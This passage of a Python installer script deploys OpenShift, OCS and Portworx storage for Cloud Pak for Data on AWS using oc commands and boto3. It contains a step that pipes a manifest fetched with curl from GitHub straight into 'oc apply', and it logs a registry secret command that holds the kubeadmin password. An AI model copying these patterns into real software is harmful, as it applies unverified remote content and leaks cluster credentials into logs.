        self.updateTemplateFile(workerocs,'${subnet-2}',self.PrivateSubnet2ID)
        self.updateTemplateFile(workerocs,'${subnet-3}',self.PrivateSubnet3ID)
    create_ocs_nodes_cmd = "oc create -f "+workerocs
    TR.info(methodName,"Create OCS nodes")
    try:
        retcode = check_output(['bash','-c', create_ocs_nodes_cmd])
        # Fixed ten-minute wait for the machineset to provision the nodes.
        time.sleep(600)
        TR.info(methodName,"Created OCS nodes %s" %retcode)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    ocs_nodes = []
    get_ocs_nodes = "oc get nodes --show-labels | grep storage-node |cut -d' ' -f1 "
    try:
        ocs_nodes = check_output(['bash','-c',get_ocs_nodes])
        nodes = ocs_nodes.split("\n")
        TR.info(methodName,"OCS_NODES %s"%nodes)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    # NOTE(review): if the command above raised, "nodes" is never assigned
    # and the loop below raises NameError — confirm whether that is intended.
    # The loop stops at len-1 because the trailing newline in the command
    # output produces an empty last element.
    i =0
    while i < len(nodes)-1:
        TR.info(methodName,"Labeling for OCS node %s " %nodes[i])
        label_cmd = "oc label nodes "+nodes[i]+" cluster.ocs.openshift.io/openshift-storage=''"
        try:
            retcode = check_output(['bash','-c', label_cmd])
            TR.info(methodName,"Label for OCS node %s returned %s" %(nodes[i],retcode))
        except CalledProcessError as e:
            TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
        i += 1
    # Deploy the OCS operator through OLM and wait five minutes for it.
    deploy_olm_cmd = "oc create -f /ibm/templates/ocs/deploy-with-olm.yaml"
    TR.info(methodName,"Deploy OLM")
    try:
        retcode = check_output(['bash','-c', deploy_olm_cmd])
        time.sleep(300)
        TR.info(methodName,"Deployed OLM %s" %retcode)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    # Create the storage cluster and wait ten minutes for it to form.
    create_storage_cluster_cmd = "oc create -f /ibm/templates/ocs/ocs-storagecluster.yaml"
    TR.info(methodName,"Create Storage Cluster")
    try:
        retcode = check_output(['bash','-c', create_storage_cluster_cmd])
        time.sleep(600)
        TR.info(methodName,"Created Storage Cluster %s" %retcode)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    # The rook toolbox manifest is fetched upstream and re-namespaced into
    # openshift-storage before being applied.
    install_ceph_tool_cmd = "curl -s https://raw.githubusercontent.com/rook/rook/release-1.1/cluster/examples/kubernetes/ceph/toolbox.yaml|sed 's/namespace: rook-ceph/namespace: openshift-storage/g'| oc apply -f -"
    TR.info(methodName,"Install ceph toolkit")
    try:
        retcode = check_output(['bash','-c', install_ceph_tool_cmd])
        TR.info(methodName,"Installed ceph toolkit %s" %retcode)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    TR.info(methodName,"Configuration of OCS for CPD completed")
#endDef
def preparePXInstall(self,icpdInstallLogFile):
    """
    Perform the AWS-side prerequisites for the Portworx installation:

      - find the IAM instance profile and role of the cluster's worker nodes
      - create and attach an IAM policy allowing the workers to manage EBS
        volumes (and record role/policy in destroy.sh for teardown)
      - open the Portworx-specific ports between the worker and master
        security groups

    The embedded triple-quoted strings preserve the equivalent AWS CLI
    commands this boto3 code was derived from.
    """
    methodName = "preparePXInstall"
    TR.info(methodName,"Pre requisite for Portworx Installation")
    """
    #INST_PROFILE_NAME=`aws ec2 describe-instances --query 'Reservations[*].Instances[*].[IamInstanceProfile.Arn]' --output text | cut -d ':' -f 6 | cut -d '/' -f 2 | grep worker* | uniq`
    """
    TR.info(methodName,"Get INST_PROFILE_NAME")
    # Worker instances are located by the Name tag "<clusterID>-worker*".
    tag_value = self.clusterID+"-worker*"
    TR.info(methodName,"Tag value of worker to look for %s"%tag_value)
    response = self.ec2.describe_instances(Filters=[{'Name': 'tag:Name','Values': [tag_value]}])
    TR.info(methodName,"response %s"%response)
    reservation = response['Reservations']
    TR.info(methodName,"reservation %s"%reservation)
    # All workers share one instance profile; the loop keeps the last one seen.
    for item in reservation:
        instances = item['Instances']
        TR.info(methodName,"instances %s"%instances)
        for instance in instances:
            if 'IamInstanceProfile' in instance:
                # Profile name is the part of the ARN after the '/'.
                instanceProfile = instance['IamInstanceProfile']['Arn'].split("/")[1]
                TR.info(methodName,"instanceProfile %s"%instanceProfile)
    TR.info(methodName,"Instance profile retrieved %s"%instanceProfile)
    #ROLE_NAME=`aws iam get-instance-profile --instance-profile-name $INST_PROFILE_NAME --query 'InstanceProfile.Roles[*].[RoleName]' --output text`
    TR.info(methodName,"Get Role name")
    iamresponse = self.iam.get_instance_profile(InstanceProfileName=instanceProfile)
    rolename = iamresponse['InstanceProfile']['Roles'][0]['RoleName']
    TR.info(methodName,"Role name retrieved %s"%rolename)
    #POLICY_ARN=`aws iam create-policy --policy-name portworx-policy-${VAR} --policy-document file://policy.json --query 'Policy.Arn' --output text`
    # EBS volume management permissions Portworx needs on the worker role.
    policycontent = {'Version': '2012-10-17', 'Statement': [{'Action': ['ec2:AttachVolume', 'ec2:ModifyVolume', 'ec2:DetachVolume', 'ec2:CreateTags', 'ec2:CreateVolume', 'ec2:DeleteTags', 'ec2:DeleteVolume', 'ec2:DescribeTags', 'ec2:DescribeVolumeAttribute', 'ec2:DescribeVolumesModifications', 'ec2:DescribeVolumeStatus', 'ec2:DescribeVolumes', 'ec2:DescribeInstances'], 'Resource': ['*'], 'Effect': 'Allow'}]}
    TR.info(methodName,"Get policy_arn")
    policyName = "portworx-policy-"+self.ClusterName
    policy = self.iam.create_policy(PolicyName=policyName,PolicyDocument=json.dumps(policycontent))
    policy_arn = policy['Policy']['Arn']
    # Record role and policy in destroy.sh so teardown can detach/delete them.
    destroy_sh = "/ibm/destroy.sh"
    self.updateTemplateFile(destroy_sh,'$ROLE_NAME',rolename)
    self.updateTemplateFile(destroy_sh,'$POLICY_ARN',policy_arn)
    TR.info(methodName,"Policy_arn retrieved %s"%policy_arn)
    # aws iam attach-role-policy --role-name $ROLE_NAME --policy-arn $POLICY_ARN
    TR.info(methodName,"Attach IAM policy")
    response = self.iam.attach_role_policy(RoleName=rolename,PolicyArn=policy_arn)
    TR.info(methodName,"Attached role policy returned %s"%response)
    """
    WORKER_TAG=`aws ec2 describe-security-groups --query 'SecurityGroups[*].Tags[*][Value]' --output text | grep worker`
    MASTER_TAG=`aws ec2 describe-security-groups --query 'SecurityGroups[*].Tags[*][Value]' --output text | grep master`
    WORKER_GROUP_ID=`aws ec2 describe-security-groups --filters Name=tag:Name,Values=$WORKER_TAG --query "SecurityGroups[*].{Name:GroupId}" --output text`
    MASTER_GROUP_ID=`aws ec2 describe-security-groups --filters Name=tag:Name,Values=$MASTER_TAG --query "SecurityGroups[*].{Name:GroupId}" --output text`
    """
    TR.info(methodName,"Retrieve tags and group id from security groups")
    ret = self.ec2.describe_security_groups()
    # Worker/master security groups are identified by Name-tag substrings.
    worker_sg_value = self.clusterID+"-worker-sg"
    master_sg_value = self.clusterID+"-master-sg"
    sec_groups = ret['SecurityGroups']
    for sg in sec_groups:
        if 'Tags' in sg:
            tags = sg['Tags']
            for tag in tags:
                if worker_sg_value in tag['Value']:
                    worker_tag = tag['Value']
                elif master_sg_value in tag['Value']:
                    master_tag = tag['Value']
    worker_group = self.ec2.describe_security_groups(Filters=[{'Name':'tag:Name','Values':[worker_tag]}])
    sec_groups = worker_group['SecurityGroups']
    for sg in sec_groups:
        worker_group_id = sg['GroupId']
    master_group = self.ec2.describe_security_groups(Filters=[{'Name':'tag:Name','Values':[master_tag]}])
    sec_groups = master_group['SecurityGroups']
    for sg in sec_groups:
        master_group_id = sg['GroupId']
    TR.info(methodName,"Retrieved worker tag %s master tag %s and worker group id %s master group id %s from security groups"%(worker_tag,master_tag,worker_group_id,master_group_id))
    """
    aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 17001-17020 --source-group $MASTER_GROUP_ID
    aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 17001-17020 --source-group $WORKER_GROUP_ID
    aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 111 --source-group $MASTER_GROUP_ID
    aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 111 --source-group $WORKER_GROUP_ID
    aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 2049 --source-group $MASTER_GROUP_ID
    aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 2049 --source-group $WORKER_GROUP_ID
    aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 20048 --source-group $MASTER_GROUP_ID
    aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 20048 --source-group $WORKER_GROUP_ID
    """
    TR.info(methodName,"Start authorize-security-group-ingress")
    # Open the Portworx management (17001-17020, 9001-9022) and NFS
    # (111, 2049, 20048) ports on the worker SG from both worker and master SGs.
    self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':17001,'ToPort':17020,'UserIdGroupPairs':[{'GroupId':master_group_id}]}])
    self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':17001,'ToPort':17020,'UserIdGroupPairs':[{'GroupId':worker_group_id}]}])
    self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':111,'ToPort':111,'UserIdGroupPairs':[{'GroupId':worker_group_id}]}])
    self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':111,'ToPort':111,'UserIdGroupPairs':[{'GroupId':master_group_id}]}])
    self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':2049,'ToPort':2049,'UserIdGroupPairs':[{'GroupId':worker_group_id}]}])
    self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':2049,'ToPort':2049,'UserIdGroupPairs':[{'GroupId':master_group_id}]}])
    self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':20048,'ToPort':20048,'UserIdGroupPairs':[{'GroupId':worker_group_id}]}])
    self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':20048,'ToPort':20048,'UserIdGroupPairs':[{'GroupId':master_group_id}]}])
    self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':9001,'ToPort':9022,'UserIdGroupPairs':[{'GroupId':worker_group_id}]}])
    self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':9001,'ToPort':9022,'UserIdGroupPairs':[{'GroupId':master_group_id}]}])
    TR.info(methodName,"End authorize-security-group-ingress")
    TR.info(methodName,"Done Pre requisite for Portworx Installation")
#endDef
def updateScc(self,icpdInstallLogFile):
    """
    Grant the security context constraints (SCCs) required by the Portworx
    installation to its service accounts:

      privileged: px-account, portworx-pvc-controller-account,
                  px-lh-account, px-csi-account (kube-system)
      anyuid:     default:default and kube-system:px-lh-account

    Parameters
    ----------
    icpdInstallLogFile : file
        Unused here; kept for signature consistency with the other
        installation-step methods.
    """
    methodName = "updateScc"
    TR.info(methodName,"Start Updating SCC for Portworx Installation")
    # (scc, subject) pairs, applied in the original order.  A data-driven
    # loop replaces six copies of the same try/except block and avoids
    # shadowing the builtin "list" as the original did.
    sccAssignments = [
        ("privileged", "system:serviceaccount:kube-system:px-account"),
        ("privileged", "system:serviceaccount:kube-system:portworx-pvc-controller-account"),
        ("privileged", "system:serviceaccount:kube-system:px-lh-account"),
        ("privileged", "system:serviceaccount:kube-system:px-csi-account"),
        ("anyuid", "system:serviceaccount:default:default"),
        ("anyuid", "system:serviceaccount:kube-system:px-lh-account"),
    ]
    for scc, subject in sccAssignments:
        cmd = "oc adm policy add-scc-to-user "+scc+" "+subject
        TR.info(methodName,"Run add-scc-to-user command %s"%cmd)
        try:
            retcode = check_output(['bash','-c', cmd])
            TR.info(methodName,"Completed %s command with return value %s" %(cmd,retcode))
        except CalledProcessError as e:
            TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    #endFor
    TR.info(methodName,"Done Updating SCC for Portworx Installation")
#endDef
def labelNodes(self,icpdInstallLogFile):
    """
    Label all worker nodes with node-role.kubernetes.io/compute=true, as
    required for the Portworx installation.

    Equivalent shell:
        WORKER_NODES=`oc get nodes | grep worker | awk '{print $1}'`
        for wnode in ${WORKER_NODES[@]}; do
            oc label nodes $wnode node-role.kubernetes.io/compute=true
        done

    Parameters
    ----------
    icpdInstallLogFile : file
        Unused here; kept for signature consistency with the other
        installation-step methods.
    """
    methodName = "labelNodes"
    TR.info(methodName," Start Label nodes for Portworx Installation")
    # Fix: initialize so the loop below cannot hit a NameError when
    # check_output raises and the except branch is taken.
    nodes = []
    get_nodes = "oc get nodes | grep worker | awk '{print $1}'"
    TR.info(methodName,"Run get_nodes command %s"%get_nodes)
    try:
        worker_nodes = check_output(['bash','-c', get_nodes])
        TR.info(methodName,"Completed %s command with return value %s" %(get_nodes,worker_nodes))
        nodes = worker_nodes.split("\n")
        TR.info(methodName,"worker nodes %s"%nodes)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    # The trailing newline in the command output yields an empty final
    # element, so label every entry except the last.
    for node in nodes[:-1]:
        TR.info(methodName,"Labeling for worker node %s " %node)
        label_cmd = "oc label nodes "+node+" node-role.kubernetes.io/compute=true"
        try:
            retcode = check_output(['bash','-c', label_cmd])
            TR.info(methodName,"Label for Worker node %s returned %s" %(node,retcode))
        except CalledProcessError as e:
            TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    #endFor
    TR.info(methodName,"Done Label nodes for Portworx Installation")
#endDef
def setpxVolumePermission(self,icpdInstallLogFile):
    """
    Mark every EBS volume attached to the cluster's worker instances as
    delete-on-termination, so volumes created for Portworx are cleaned up
    together with their node.

    Equivalent shell:
        WORKER_INSTANCE_ID=`aws ec2 describe-instances --filters 'Name=tag:Name,Values=*worker*' --output text --query 'Reservations[*].Instances[*].InstanceId'`
        DEVICE_NAME=`aws ec2 describe-instances --filters 'Name=tag:Name,Values=*worker*' --output text --query 'Reservations[*].Instances[*].BlockDeviceMappings[*].DeviceName' | uniq`
        for winstance in ${WORKER_INSTANCE_ID[@]}; do
            for device in ${DEVICE_NAME[@]}; do
                aws ec2 modify-instance-attribute --instance-id $winstance --block-device-mappings "[{\"DeviceName\": \"$device\",\"Ebs\":{\"DeleteOnTermination\":true}}]"
            done
        done
    """
    methodName = "setpxVolumePermission"
    TR.info(methodName,"Start setpxVolumePermission")
    # Worker instances are selected by their Name tag "<clusterID>-worker*".
    workerFilter = [{'Name': 'tag:Name','Values': [self.clusterID+"-worker*"]}]
    described = self.ec2.describe_instances(Filters=workerFilter)
    for reservationEntry in described['Reservations']:
        for workerInstance in reservationEntry['Instances']:
            instanceId = workerInstance['InstanceId']
            # Flip DeleteOnTermination for each attached block device.
            for mapping in workerInstance['BlockDeviceMappings']:
                deviceName = mapping['DeviceName']
                resp = self.ec2.modify_instance_attribute(InstanceId=instanceId,BlockDeviceMappings=[{'DeviceName': deviceName,'Ebs': {'DeleteOnTermination': True}}])
                TR.info(methodName,"Modified instance attribute for instance %s device name %s returned %s"%(instanceId,deviceName,resp))
            #endFor
        #endFor
    #endFor
    TR.info(methodName,"Completed setpxVolumePermission")
#endDef
def configurePx(self, icpdInstallLogFile):
    """
    Install and configure Portworx storage for Cloud Pak for Data.

    Sequence: resolve the internal image-registry route, create a registry
    pull secret, prepare/label the nodes (helper methods on this class),
    apply the Portworx install manifest and spec, create the Portworx
    storage classes, and finally mark the worker EBS volumes for
    delete-on-termination. Fixed sleeps between steps give the cluster time
    to reconcile each change.

    Parameters
    ----------
    icpdInstallLogFile : file object
        Open install log handle passed through to the helper steps.
    """
    methodName = "configurePx"
    TR.info(methodName," Start configuration of Portworx for CPD")
    # Host of the cluster's default image-registry route; used as the
    # docker-server for the pull secret created below.
    default_route = "oc get route default-route -n openshift-image-registry --template='{{ .spec.host }}'"
    TR.info(methodName,"Get default route %s"%default_route)
    try:
        self.ocr = check_output(['bash','-c', default_route])
        TR.info(methodName,"Completed %s command with return value %s" %(default_route,self.ocr))
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    create_secret_cmd = "oc create secret docker-registry regcred --docker-server="+self.ocr+" --docker-username=kubeadmin --docker-password="+self.ocpassword+" -n kube-system"
    TR.info(methodName,"Create OC secret for PX installation %s"%create_secret_cmd)
    try:
        retcode = check_output(['bash','-c', create_secret_cmd])
        TR.info(methodName,"Completed %s command with return value %s" %(create_secret_cmd,retcode))
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    # Node preparation steps (defined elsewhere on this class), each followed
    # by a settle pause.
    self.preparePXInstall(icpdInstallLogFile)
    time.sleep(30)
    self.updateScc(icpdInstallLogFile)
    time.sleep(30)
    self.labelNodes(icpdInstallLogFile)
    time.sleep(30)
    # Sanity check: log the nodes that now carry the compute label.
    label_cmd = "oc get nodes --show-labels | grep 'node-role.kubernetes.io/compute=true'"
    TR.info(methodName,"Run label_cmd command %s"%label_cmd)
    try:
        retcode = check_output(['bash','-c', label_cmd])
        TR.info(methodName,"Completed %s command with return value %s" %(label_cmd,retcode))
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    time.sleep(30)
    # Apply the Portworx installer manifest, then the cluster spec.
    px_install_cmd = "oc apply -f /ibm/templates/px/px-install.yaml"
    TR.info(methodName,"Run px-install command %s"%px_install_cmd)
    try:
        retcode = check_output(['bash','-c', px_install_cmd])
        TR.info(methodName,"Completed %s command with return value %s" %(px_install_cmd,retcode))
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    time.sleep(180)
    px_spec_cmd = "oc create -f /ibm/templates/px/px-spec.yaml"
    TR.info(methodName,"Run px-spec command %s"%px_spec_cmd)
    try:
        retcode = check_output(['bash','-c', px_spec_cmd])
        TR.info(methodName,"Completed %s command with return value %s" %(px_spec_cmd,retcode))
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    time.sleep(300)
    # Create the Portworx storage classes once the cluster is up.
    create_px_sc = "sudo sh /ibm/templates/px/px-storageclasses.sh"
    TR.info(methodName,"Run px sc command %s"%create_px_sc)
    try:
        retcode = check_output(['bash','-c', create_px_sc])
        TR.info(methodName,"Completed %s command with return value %s" %(create_px_sc,retcode))
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    self.setpxVolumePermission(icpdInstallLogFile)
    TR.info(methodName,"Configuration of Portworx for CPD completed")
#endDef
def installOCP(self, icpdInstallLogFile):
    """
    Install Red Hat OpenShift Container Platform and perform base cluster
    configuration.

    Major phases:
      1. Select 1-AZ or 3-AZ templates and substitute ${...} placeholders.
      2. Download openshift-install/oc/kubectl from S3 and run the installer.
      3. Wire up kubeconfig, read the kubeadmin password and log in.
      4. Create machine autoscaler, health check, registry config, htpasswd
         auth, machine configs, and cluster autoscaler.
      5. Capture the console route in self.openshiftURL.

    Side effects: sets self.ocpassword, self.logincmd, self.clusterID and
    self.openshiftURL; writes files under /root, /etc/containers and /ibm.

    Parameters
    ----------
    icpdInstallLogFile : file object
        Open install log handle; subprocess output is redirected into it.
    """
    methodName = "installOCP"
    TR.info(methodName," Start installation of Openshift Container Platform")
    # Generic file names consumed by the later steps.
    installConfigFile = "/ibm/installDir/install-config.yaml"
    autoScalerFile = "/ibm/templates/cpd/machine-autoscaler.yaml"
    healthcheckFile = "/ibm/templates/cpd/health-check.yaml"
    # Topology-specific template sources (single vs three availability zones).
    icf_1az = "/ibm/installDir/install-config-1AZ.yaml"
    icf_3az = "/ibm/installDir/install-config-3AZ.yaml"
    asf_1az = "/ibm/templates/cpd/machine-autoscaler-1AZ.yaml"
    asf_3az = "/ibm/templates/cpd/machine-autoscaler-3AZ.yaml"
    hc_1az = "/ibm/templates/cpd/health-check-1AZ.yaml"
    hc_3az = "/ibm/templates/cpd/health-check-3AZ.yaml"
    if(len(self.zones)==1):
        shutil.copyfile(icf_1az,installConfigFile)
        shutil.copyfile(asf_1az,autoScalerFile)
        shutil.copyfile(hc_1az, healthcheckFile)
    else:
        shutil.copyfile(icf_3az,installConfigFile)
        shutil.copyfile(asf_3az,autoScalerFile)
        shutil.copyfile(hc_3az, healthcheckFile)
    # Fill in the ${...} placeholders of install-config.yaml.
    self.updateTemplateFile(installConfigFile,'${az1}',self.zones[0])
    self.updateTemplateFile(installConfigFile,'${baseDomain}',self.DomainName)
    self.updateTemplateFile(installConfigFile,'${master-instance-type}',self.MasterInstanceType)
    self.updateTemplateFile(installConfigFile,'${worker-instance-type}',self.ComputeInstanceType)
    self.updateTemplateFile(installConfigFile,'${worker-instance-count}',self.NumberOfCompute)
    self.updateTemplateFile(installConfigFile,'${master-instance-count}',self.NumberOfMaster)
    self.updateTemplateFile(installConfigFile,'${region}',self.region)
    self.updateTemplateFile(installConfigFile,'${subnet-1}',self.PrivateSubnet1ID)
    self.updateTemplateFile(installConfigFile,'${subnet-2}',self.PublicSubnet1ID)
    self.updateTemplateFile(installConfigFile,'${pullSecret}',self.readFileContent(self.pullSecret))
    self.updateTemplateFile(installConfigFile,'${sshKey}',self.readFileContent("/root/.ssh/id_rsa.pub"))
    self.updateTemplateFile(installConfigFile,'${clustername}',self.ClusterName)
    self.updateTemplateFile(installConfigFile, '${FIPS}',self.EnableFips)
    self.updateTemplateFile(installConfigFile, '${PrivateCluster}',self.PrivateCluster)
    self.updateTemplateFile(installConfigFile, '${cluster-cidr}',self.ClusterNetworkCIDR)
    self.updateTemplateFile(installConfigFile, '${machine-cidr}', self.VPCCIDR)
    self.updateTemplateFile(autoScalerFile, '${az1}', self.zones[0])
    self.updateTemplateFile(healthcheckFile, '${az1}', self.zones[0])
    # Additional zone/subnet placeholders only exist in the 3-AZ templates.
    if(len(self.zones)>1):
        self.updateTemplateFile(installConfigFile,'${az2}',self.zones[1])
        self.updateTemplateFile(installConfigFile,'${az3}',self.zones[2])
        self.updateTemplateFile(installConfigFile,'${subnet-3}',self.PrivateSubnet2ID)
        self.updateTemplateFile(installConfigFile,'${subnet-4}',self.PrivateSubnet3ID)
        self.updateTemplateFile(installConfigFile,'${subnet-5}',self.PublicSubnet2ID)
        self.updateTemplateFile(installConfigFile,'${subnet-6}',self.PublicSubnet3ID)
        self.updateTemplateFile(autoScalerFile, '${az2}', self.zones[1])
        self.updateTemplateFile(autoScalerFile, '${az3}', self.zones[2])
        self.updateTemplateFile(healthcheckFile, '${az2}', self.zones[1])
        self.updateTemplateFile(healthcheckFile, '${az3}', self.zones[2])
    TR.info(methodName,"Download Openshift Container Platform")
    self.getS3Object(bucket=self.cpdbucketName, s3Path="3.5.2/openshift-install", destPath="/ibm/openshift-install")
    self.getS3Object(bucket=self.cpdbucketName, s3Path="3.5.2/oc", destPath="/usr/bin/oc")
    self.getS3Object(bucket=self.cpdbucketName, s3Path="3.5.2/kubectl", destPath="/usr/bin/kubectl")
    # NOTE(review): os.chmod REPLACES the mode; S_IEXEC alone leaves only the
    # owner execute bit (no read/write). Presumably works because root runs
    # everything here — verify before reuse.
    os.chmod("/usr/bin/oc", stat.S_IEXEC)
    os.chmod("/usr/bin/kubectl", stat.S_IEXEC)
    TR.info(methodName,"Initiating installation of Openshift Container Platform")
    os.chmod("/ibm/openshift-install", stat.S_IEXEC)
    install_ocp = "sudo ./openshift-install create cluster --dir=/ibm/installDir --log-level=debug"
    TR.info(methodName,"Output File name: %s"%icpdInstallLogFile)
    try:
        # Installer output goes to the log file, so communicate() returns
        # (None, None); the call blocks until the installer finishes.
        process = Popen(install_ocp,shell=True,stdout=icpdInstallLogFile,stderr=icpdInstallLogFile,close_fds=True)
        stdoutdata,stderrdata=process.communicate()
    except CalledProcessError as e:
        TR.error(methodName, "ERROR return code: %s, Exception: %s" % (e.returncode, e), e)
        raise e
    TR.info(methodName,"Installation of Openshift Container Platform %s %s" %(stdoutdata,stderrdata))
    time.sleep(30)
    # Make the generated kubeconfig the default for oc/kubectl.
    destDir = "/root/.kube"
    if (not os.path.exists(destDir)):
        os.makedirs(destDir)
    shutil.copyfile("/ibm/installDir/auth/kubeconfig","/root/.kube/config")
    self.ocpassword = self.readFileContent("/ibm/installDir/auth/kubeadmin-password").rstrip("\n\r")
    self.logincmd = "oc login -u kubeadmin -p "+self.ocpassword
    try:
        # NOTE(review): subprocess.call never raises CalledProcessError (only
        # check_call does), so this handler is effectively unreachable.
        call(self.logincmd, shell=True,stdout=icpdInstallLogFile)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    # The cluster id is embedded in the machineset labels; it is substituted
    # into the autoscaler and health-check manifests below.
    get_clusterId = r"oc get machineset -n openshift-machine-api -o jsonpath='{.items[0].metadata.labels.machine\.openshift\.io/cluster-api-cluster}'"
    TR.info(methodName,"get_clusterId %s"%get_clusterId)
    try:
        self.clusterID = check_output(['bash','-c',get_clusterId])
        TR.info(methodName,"self.clusterID %s"%self.clusterID)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    self.updateTemplateFile(autoScalerFile, 'CLUSTERID', self.clusterID)
    create_machine_as_cmd = "oc create -f "+autoScalerFile
    TR.info(methodName,"Create of Machine auto scaler")
    try:
        retcode = check_output(['bash','-c', create_machine_as_cmd])
        TR.info(methodName,"Created Machine auto scaler %s" %retcode)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    self.updateTemplateFile(healthcheckFile, 'CLUSTERID', self.clusterID)
    create_healthcheck_cmd = "oc create -f "+healthcheckFile
    TR.info(methodName,"Create of Health check")
    try:
        retcode = check_output(['bash','-c', create_healthcheck_cmd])
        TR.info(methodName,"Created Health check %s" %retcode)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    # Internal image registry: expose the default route and tune it for CPD.
    TR.info(methodName,"Create OCP registry")
    registry_mc = "/ibm/templates/cpd/insecure-registry.yaml"
    registries = "/ibm/templates/cpd/registries.conf"
    crio_conf = "/ibm/templates/cpd/crio.conf"
    crio_mc = "/ibm/templates/cpd/crio-mc.yaml"
    route = "default-route-openshift-image-registry.apps."+self.ClusterName+"."+self.DomainName
    self.updateTemplateFile(registries, '${registry-route}', route)
    # MachineConfig file payloads must be base64-encoded.
    config_data = base64.b64encode(self.readFileContent(registries))
    self.updateTemplateFile(registry_mc, '${config-data}', config_data)
    crio_config_data = base64.b64encode(self.readFileContent(crio_conf))
    self.updateTemplateFile(crio_mc, '${crio-config-data}', crio_config_data)
    route_cmd = "oc patch configs.imageregistry.operator.openshift.io/cluster --type merge -p '{\"spec\":{\"defaultRoute\":true,\"replicas\":"+self.NumberOfAZs+"}}'"
    TR.info(methodName,"Creating route with command %s"%route_cmd)
    annotate_cmd = "oc annotate route default-route haproxy.router.openshift.io/timeout=600s -n openshift-image-registry"
    sessionAffinity_cmd = "oc patch svc/image-registry -p '{\"spec\":{\"sessionAffinity\": \"ClientIP\"}}' -n openshift-image-registry"
    update_mgmt_state_cmd = "oc patch configs.imageregistry.operator.openshift.io/cluster --type merge -p '{\"spec\":{\"managementState\":\"Unmanaged\"}}'"
    set_s3_storage_limit = "oc set env deployment/image-registry -n openshift-image-registry REGISTRY_STORAGE_S3_CHUNKSIZE=104857600"
    try:
        retcode = check_output(['bash','-c', route_cmd])
        TR.info(methodName,"Created route with command %s returned %s"%(route_cmd,retcode))
        time.sleep(30)
    except CalledProcessError as e:
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
    try:
        retcode = call(annotate_cmd,shell=True, stdout=icpdInstallLogFile)
        TR.info(methodName,"annotate_cmd %s retcode=%s" %(annotate_cmd,retcode))
        time.sleep(30)
        retcode = call(sessionAffinity_cmd,shell=True, stdout=icpdInstallLogFile)
        TR.info(methodName,"sessionAffinity_cmd %s retcode=%s" %(sessionAffinity_cmd,retcode))
        time.sleep(30)
        retcode = call(update_mgmt_state_cmd,shell=True, stdout=icpdInstallLogFile)
        TR.info(methodName,"update_mgmt_state_cmd %s retcode=%s" %(update_mgmt_state_cmd,retcode))
        time.sleep(30)
        retcode = call(set_s3_storage_limit,shell=True, stdout=icpdInstallLogFile)
        TR.info(methodName,"set_s3_storage_limit %s retcode=%s" %(set_s3_storage_limit,retcode))
        time.sleep(30)
    except CalledProcessError as e:
        # NOTE(review): call() does not raise CalledProcessError; failures
        # above are only visible through the logged retcode.
        TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
